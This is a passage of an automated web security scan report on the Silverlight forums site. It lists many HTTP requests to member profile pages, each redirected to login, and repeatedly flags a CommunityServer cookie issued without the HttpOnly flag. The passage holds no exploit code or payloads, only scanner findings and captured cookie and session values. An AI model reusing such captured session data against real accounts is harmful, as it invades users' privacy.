GET /forums/thread/396640.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 ETag: "" Location: /forums/p/171739/396640.aspx#396640 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:42 GMT; expires=Sun, 29-Jan-2012 23:20:42 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:20:42 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73525 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forums/viewall.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 73300 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:47 GMT; expires=Sun, 29-Jan-2012 23:20:47 GMT; path=/ Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:47 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:20:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:32 GMT; expires=Sun, 29-Jan-2012 23:16:32 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/BradleyGZ.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fBradleyGZ.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:32 GMT; expires=Sun, 29-Jan-2012 23:16:32 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:32 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fBradleyGZ.a ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/ColinBlair.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 238 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fColinBlair.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:00 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fColinBlair. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Daoping-Liu-_2D00_-MSFT.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 251 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDaoping-Liu-_2D00_-MSFT.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDaoping-Liu ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:58 GMT; expires=Sun, 29-Jan-2012 23:16:58 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Datikos.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 235 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDatikos.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:58 GMT; expires=Sun, 29-Jan-2012 23:16:58 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:58 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDatikos.asp ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:09 GMT; expires=Sun, 29-Jan-2012 23:17:09 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/David-Anson.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 239 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDavid-Anson.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:09 GMT; expires=Sun, 29-Jan-2012 23:17:09 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:09 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDavid-Anson ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Fredrik_5F00_.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 241 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFredrik_5F00_.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:20 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFredrik_5F0 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Furukoo.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 235 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFurukoo.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:04 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFurukoo.asp ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/GFR_5F00_2009.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 241 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGFR_5F00_2009.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:33 GMT; expires=Sun, 29-Jan-2012 23:16:33 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:33 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGFR_5F00_20 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Gaz3ll.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 234 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGaz3ll.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:00 GMT; expires=Sun, 29-Jan-2012 23:17:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:59 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fGaz3ll.aspx ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/Jonathan-Shen-_1320_-MSFT.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 253 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fJonathan-Shen-_1320_-MSFT.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fJonathan-Sh ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/MF_5F00_MiEK.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 240 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMF_5F00_MiEK.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:02 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMF_5F00_MiE ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/MisterGoodcat.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 241 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMisterGoodcat.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fMisterGoodc ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
